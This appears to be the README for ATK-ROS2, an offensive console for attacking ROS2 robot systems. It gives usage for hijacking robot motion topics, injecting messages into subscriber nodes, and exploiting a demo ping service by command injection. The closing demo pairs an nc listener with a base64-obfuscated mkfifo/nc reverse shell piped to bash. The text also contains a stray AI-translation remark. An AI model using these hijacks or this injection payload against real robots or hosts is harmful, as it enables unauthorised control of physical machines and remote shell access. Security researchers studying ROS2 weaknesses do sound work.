Environment Requirement: Ubuntu 22.04 (Jammy) or later
This is a penetration testing environment for ROS2, designed as a production-like attack box.
# Upgrade pip
$ pip install --upgrade pip
# Install Python requirements
$ pip install -r requirements.txt --config-settings --confirm-license= --verbose
# Make the install script executable
$ chmod +x ./install/ros2-install.sh
# Run ROS2 install script with sudo
$ sudo ./install/ros2-install.sh
$ python3 atk_builder.py- This is a payload builder module used to hijack specific ROS2 nodes, manipulate paths, and modify execution flow.
- It generates
.atkfiles that can be used with the ATK-ROS2 program.
$ python3 atk_ros2.py
ATK-ROS2$ help
Global commands:
show - Show all boards
search <keyword> - Search boards
use <board_name> - Select a board
node - List ROS2 nodes/topics
hijack - Hijack nodes with geometry_msgs/msg/Twist
exit / back - Return to previous level or exit
quit - Exit console immediately- Displays all available modules/boards
ATK-ROS2$ show
Available Boards
================================================================================
# Name Description
--------------------------------------------------------------------------------
0 action_msgs/msg/GoalInfo ROS2 Message Board
1 action_msgs/msg/GoalStatus ROS2 Message Board
<SNIP>...
194 visualization_msgs/msg/MeshFile ROS2 Message Board
195 visualization_msgs/msg/UVCoordinate ROS2 Message Board
- Enter a specific module:
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ info
- Shows the parameters required by the current module:
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ set u 999
- Set a parameter value:
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ node
- Lists nodes compatible with the current module:
Tip: Running
nodeat the root menu lists all ROS2 nodes.
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ run
- Launch the payload:
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ back
- Return to the previous menu:
ATK-ROS2$ hijack
- Hijack a ROS2 device, e.g., for path control:
Here’s your section translated into English, keeping the ./pic/image references intact but updating alt text for clarity:
- Launch ATK-Builder to construct the payload
$ python3 atk_builder.py- The center is used as the starting point, with the red circle as a reference radius.
- Set the first point:
- Set the second point:
- Set the third point:
You can set an unlimited number of points based on your needs. The turtle will follow the points in the order you defined.
- Save the
.atkfile:
/home/map/Desktop/atk-ros2/payload.atk
- Start the turtlesim test program on another host
$ ros2 run turtlesim turtlesim_node
- Launch the ROS2 pentest box
$ python3 atk_ros2.py- List all nodes:
ATK-ROS2$ node
- Enter hijack mode and select option 1:
ATK-ROS2$ hijack
- Input the
.atkfile and specify the target control node:
? Select hijack mode: 1. Drawing coordinates hijack
? Enter path to .atk file /home/map/Desktop/atk-ros2/payload.atk
[+] Successfully loaded 6 points, sending Twist messages...
? Enter target node/topic (e.g., turtle1/cmd_vel) turtlesim/turtle1/cmd_vel
- Send the payload:
- The turtle successfully follows the hijacked path:
- Use the
std_msgs/msg/Stringmodule
ATK-ROS2$ use std_msgs/msg/String
ATK-ROS2[std_msgs/msg/String]$ node
- Set the target node and payload
ATK-ROS2[std_msgs/msg/String]$ set node string_subscriber/string_topic
ATK-ROS2[std_msgs/msg/String]$ set data Pw3d!
ATK-ROS2[std_msgs/msg/String]$ run
Victim side:
- You can also send content from a file:
ATK-ROS2[std_msgs/msg/String]$ set data file:/home/map/Desktop/atk-ros2/demo/msg.txt
ATK-ROS2[std_msgs/msg/String]$ run
Victim side:
- In the demo, a vulnerable backdoor node has been implemented.
- If interested, you can also explore industrial exploit tools like S-Clustr and Tyran.
Victim side:
- Upload the backdoor node to the controlled host:
$ cd ./demo/command_host_service
$ ./start.sh
Attacker side:
ATK-ROS2$ node
$ sudo nc -lvnp 443ATK-ROS2$ use std_msgs/msg/String
ATK-ROS2[std_msgs/msg/String]$ set node ping_service_subscriber/ping_ip
ATK-ROS2[std_msgs/msg/String]$ set data 127.0.0.1| echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguMC4xMTkgNDQzID4vdG1wL2Y=|base64 -d |bash
ATK-ROS2[std_msgs/msg/String]$ exploit- The target was successfully hit:
